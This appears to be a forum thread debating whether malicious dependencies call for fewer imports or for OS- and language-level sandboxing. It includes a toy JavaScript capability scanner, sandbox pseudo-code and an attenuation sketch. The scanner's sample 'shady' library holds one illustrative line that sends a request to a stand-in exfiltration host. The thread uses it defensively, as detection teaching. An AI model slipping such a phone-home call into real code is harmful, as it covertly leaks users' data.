This is why I don't think this is an OS problem. I think it's a developer mindset problem.
Dependencies are bad.
Every single dependency in your code is a liability, a security loophole, a potential legal risk, and a time sink.
Every dependency needs to be audited and evaluated, and all the changes on every update reviewed. Otherwise who knows what got injected into your code?
Evaluating each dependency for potential risk is important. How much coding time is this saving? Would it, in fact, be quicker to just write that code yourself? Can you vendor it and cut out features you don't need? How many other people use this? Is it supported by its original maintainer? Does it have a deep-pocketed maintainer that could be an alternative target for legal claims?
Mostly, people don't do that and just "import antigravity" without wondering if there's a free lunch in there...
I strongly disagree that this isn't an OS problem.
s/dependency/application/g in your comment. Dependencies are just applications that are controlled through code rather than via a mouse/keyboard. They're not special.
I run a minimal Arch setup at home for my development machine, partially for security/reliability reasons -- less software means fewer chances for something to go wrong. But this is a band-aid fix. A minimal Arch setup that forgoes modern niceties like a graphical file browser is not a general-purpose solution to software security.
When someone comes to me and says that an app is stealing their iOS contacts behind their back, my response isn't, "well, it's your own fault for installing apps in the first place. Apps are bad." My response is to say that iOS apps shouldn't have access to contacts without explicit permission.
The same is true of language dependencies. Both users and developers need the ability to run untrusted code. The emphasis on "try your hardest not to install anything" is (very temporarily) good advice, but it's ultimately counterproductive and harmful if it distracts us from solving the root issues.
But until we can provide a form of static analysis that can tell you whether a dependency is malicious or not, we're stuck either manually auditing them, or not using them.
There's very little to choose between a user coming to you saying "I ran a bad application" and "I ran a bad application and clicked on the allow button because I had no way of knowing it was a bad application and I have to allow all applications". Users are notorious for defeating access permissions. Implementing this same bad solution on developers isn't going to work.
At the risk of sounding like someone who wants to spark a language fight (which I genuinely don't) this is why I love Go. The standard library is so good that I rarely need to bring in any third-party dependencies, and the few I do use are extremely well-known with many eyes on their code.
That sounds like a boil the ocean solution. We're never going to get all developers to be perfect, and besides there are evil devs as well so the solution has to be elsewhere.
The solution most people seem to be talking about is sandboxing imports off into containers (sandboxes, whatever -- these will end up as containers) so that their access to sensitive data and APIs can be controlled. These aren't "code dependencies" any more, these are "runtime services". It implicitly conforms to "dependencies are bad" by forcing all dependencies to be external services. But it doesn't allow you to actually import known-good dependencies from trusted sources.
And specifically granting access permissions to code has always worked before, right? I mean, people never just click "allow" all the time so they're not bothered by security dialogs, do they? Why are we talking about implementing such a proven-bad solution yet again?
> And specifically granting access permissions to code has always worked before, right? I mean, people never just click "allow" all the time so they're not bothered by security dialogs, do they? Why are we talking about implementing such a proven-bad solution yet again?
To be clear, is your argument that it's too hard for us to teach people to avoid granting unnecessary permissions, but not too hard for us to teach users not to install any software in the first place?
Educating users about permissions is hard, convincing users not to download anything is impossible.
My argument is that user behaviour proves that this solution isn't actually a solution. It shifts the blame, but it doesn't solve the problem.
Developers will just allow the bad code access to the things it says it needs, because it says it needs them. Meanwhile we have another sandbox layer to deal with, which isn't good.
We need to reduce the proliferation of dependencies, and only use them for important things, to reduce the attack surface. And we need to tighten up the package managers so typosquatting and duplication of interfaces is flagged (if not banned), and we need some kind of static analysis that flags what capabilities a library uses. And I'm sure there's lots more ways of solving it that I can't think of here.
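A capability-flagging pass doesn't need to be sophisticated to illustrate the idea. Here's a toy sketch in JavaScript -- the module list and the "shady" source are invented for illustration, and a real tool would parse the AST rather than regex for require() calls:

```javascript
// Toy capability scanner: flags which sensitive Node core modules a
// dependency's source references. A real tool would parse the AST and
// track dynamic requires; this regex sketch misses obfuscated calls.
const SENSITIVE = new Map([
  ['fs', 'disk'], ['net', 'network'], ['http', 'network'],
  ['https', 'network'], ['dns', 'network'], ['child_process', 'exec'],
]);

function scanCapabilities(source) {
  const found = new Set();
  const re = /require\(['"]([^'"]+)['"]\)/g;
  let m;
  while ((m = re.exec(source)) !== null) {
    if (SENSITIVE.has(m[1])) found.add(SENSITIVE.get(m[1]));
  }
  return [...found].sort();
}

// Example: a "sort" library that quietly phones home.
const shady = `
  const sort = (a) => a.slice().sort();
  const https = require('https');
  https.get('https://evil.example/exfil');
  module.exports = sort;
`;
console.log(scanCapabilities(shady)); // [ 'network' ]
```

Even something this crude would make a package manager's "this sorting library wants network access" warning possible, which is the part users can actually act on.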
> We need to reduce the proliferation of dependencies, and only use them for important things
What you're proposing here is infinitely harder than teaching users to be responsible with permissions. If you can't teach a developer not to grant code access to everything it asks for, you are not going to be able to teach them to install fewer dependencies. It just won't happen, it's completely unrealistic.
A lot of the solutions you're proposing have significant downsides, or they don't scale. Static analysis is great, but doesn't work in highly dynamic languages like Python, Javascript, and Lisp. It also can't handle ambiguously malicious behavior, like device fingerprinting. Static analysis is just a worse version of sandboxing with more holes and more guesswork. Manual reviews don't scale at all -- they're even more unrealistic of a solution than trusting developers to be frugal about the code they install. Tightening package names is nice, but again, not a silver bullet. Sometimes official libraries with official names go bad as well. We have a lot of solutions like this that we can observe in the wild, and they don't really work very well. Google Play still has malware, even though Google says they review apps and remove fraudulent submissions.
On the other hand, we actually have pretty good evidence that sandboxing at least helps -- namely, iOS and the web. Sandboxing isn't perfect, it's a very complicated UX/UI problem that I consider still somewhat unsolved. But, iOS is making decent progress here. Their recent permission reminder system periodically asks users if they want to continue granting permissions to an app -- that's really smart design. The web has also been making excellent progress for a long time. The web has a lot of flaws, but it is a gold standard for user-accessible sandboxing. Nobody thinks twice about clicking on a random link in Twitter, because they don't have to. There's obviously still a lot that needs to improve, but if the primary concern we had about malicious packages on PyPi was that they might mine bitcoin in the background, that would be a very large improvement over stealing SSH keys.
The reason sandboxing is so good is specifically because it shifts blame. Shifting blame is great. With the current situation, I need to audit the code and do research for every single app I install on my PC -- I have to decide whether the author is trustworthy. If the author isn't trustworthy, there's nothing I can do other than avoid their app entirely. This is complicated because trust isn't binary. So I can't just separate authors into "good" and "bad" categories, I have to grade them on a curve.
I do this. It's exhausting. A system where I manage permissions instead of granting each codebase a binary "trusted" label would be a massive improvement to my life, and it's crazy to me that people are in effect saying that we should keep dependencies terrible and exhausting for everyone just because the solution won't help users who are already going to ignore safeguards and install malware anyway.
Imagine if when multiuser systems were first proposed for Unix, somebody said, "yeah, but everyone's just going to grant sudo willy-nilly or share passwords, so why even separate accounts? Instead, we should encourage network admins to minimize the number of people with access to a remote system to just one or two." The current NodeJS sandboxing proposals would mean that when I import a library, I can globally restrict its permissions and its dependencies' permissions in something like 3 lines of code -- the whole thing is completely under my control. The alternative is I spend hours trying to figure out if it's safe to import. How is that better?
Because a dependency isn't a service. You're talking about dependencies as if they're standalone services that you consume. I think that's probably the predominant attitude at the moment, so sandboxing dependencies to turn them into (effectively) standalone services that you consume might work.
But I don't use dependencies like that. I'm mostly just importing useful functions from a library. Having to sandbox that function away from the rest of my code is not going to work. I'll end up copy/pasting the code into my project to avoid that.
When we talk about sandboxing dependencies, we're talking about sandboxing at an API level, not an OS level -- in some languages (particularly memory-unsafe languages) that's difficult, but in general the intention isn't to put dependencies in a separate process; it's to restrict access to dangerous APIs like network requests.
Sandboxing might be something like, "I'm importing a function, and I'm going to define a scope, and within that scope, it will have access to these methods, and nothing else." Imagine the following pseudo-code in a fictional, statically typed, rigid language.
import std from 'std';
import disk from 'io';
import request from 'http';

//This dependency (and its sub-dependencies) can
//only call methods in the std library, nothing else.
//I can call special_sort anywhere I want and I *know*
//it can't make network requests or access the disk.
//All it can do is call a few core std libraries.
import (std){ special_sort } from 'shady_special_sort';

function save (data) {
  disk.write('output.log', data);
}

function safe_save (data) {
  if (!valid(data)) { return false; }
  save(data);
  return true;
}

function main () {
  //An on-the-fly sandbox -- access to safe_save and request.
  (request, safe_save){
    save('my_malware_payload'); //compile-time error
    disk.write('output.log', 'my_malware_payload'); //compile-time error
    safe_save('my_malware_payload'); //allowed
  }
}
We're not treating our dependencies or even our inline code as a service here -- we're not loading the code into a separate process or forcing ourselves to go through a connector to call into the API. We're just defining a static constraint that will stop our program from compiling if the code tries to do something we don't want, it's no different than a type-check.
The difference between this and pure static analysis is that static analysis isn't something that's built into the language, and static analysis tries to guess intent. Static analysis says, "that looks shifty, let's alert someone." A language-level sandbox says, "I don't care about the intent, you have access to X and that's it."
Even in a dynamic language like JS, when people talk about stuff like the Realms proposal[0][1], they're talking about a system that's a lot closer to the above than they are about creating standalone services that would live in their own processes or threads.
This kind of style of thinking about security lends itself particularly well to functional languages and functional coding styles, but there's no reason it can't also work with more traditional class-based approaches as well -- you just have to be more careful about what you're passing around and what has access to what objects.
class Dangerous () {
  unsafe_write (data) {
    //unvalidated disk access
  }
}

class Safe () {
  public Dangerous ref = new Dangerous();

  safe_write (data) {
    validate(data);
    ref.unsafe_write(data);
  }
}

function main () {
  Safe instance = new Safe();
  (instance){
    //I've just accidentally given my sandbox
    //access to `unsafe_write` through
    //`instance.ref`, because I left that
    //property public.
  }
}
Even with that concern, worrying about my own references is still way, way easier than worrying about an entire, separate codebase that I can't control.
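In today's JavaScript, the closest you can get without language support is capability discipline: hand untrusted code a narrow, validating wrapper instead of the dangerous object itself. A minimal sketch -- the plugin and the validation rule are made up for illustration:

```javascript
// The "dangerous" capability: unrestricted writes to a log.
const log = [];
function unsafeWrite(data) { log.push(data); }

// Attenuated capability: validates before delegating. This wrapper is
// the only reference we hand to untrusted code.
function safeWrite(data) {
  if (typeof data !== 'string' || data.includes('payload')) return false;
  unsafeWrite(data);
  return true;
}

// An untrusted "plugin" receives only what we pass in; its arguments
// give it no path back to unsafeWrite or to the log itself.
function shadyPlugin(write) {
  write('hello');                     // allowed
  return write('my_malware_payload'); // rejected by the wrapper
}

console.log(shadyPlugin(safeWrite)); // false
console.log(log);                    // [ 'hello' ]
```

The catch is exactly the one above: this only holds if nothing else in scope leaks a reference to unsafeWrite, which is the kind of invariant a language-level sandbox could check for you.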
Ideally, though, we wouldn't all have to reinvent the wheel for the n+1th time. The great power of software is that something can be written once and used over and over again, unlike the way each building needs to be built from the ground up, each dinner has to be cooked from the ingredients every day, etc.
Giving up this kind of modularity, and the ability to rely on other software engineers' work, would throw the baby out with the bathwater.
Sure you need to apply judgement about whether a library seems legit, but the other end of the spectrum is the not-invented-here attitude, which is also bad.
The other question to ask yourself is if you want the dependency as a visible external thing, or do you want it cut & pasted into your code?
Just saying that "dependencies are bad" means people are more likely to cut and paste that algorithm or bit of code into their application rather than taking it from some sort of package. In that case you also don't know that it's a dependency, and you don't get any updates or bug fixes for it either.
Have to be careful about those unintended consequences there.
I agree with you: we need developers who take responsibility for their publications, review and test their codebase and all its dependencies, proper identification of "real" published code (integrity checks), and also the ability to opt in to placing trust in different maintainers.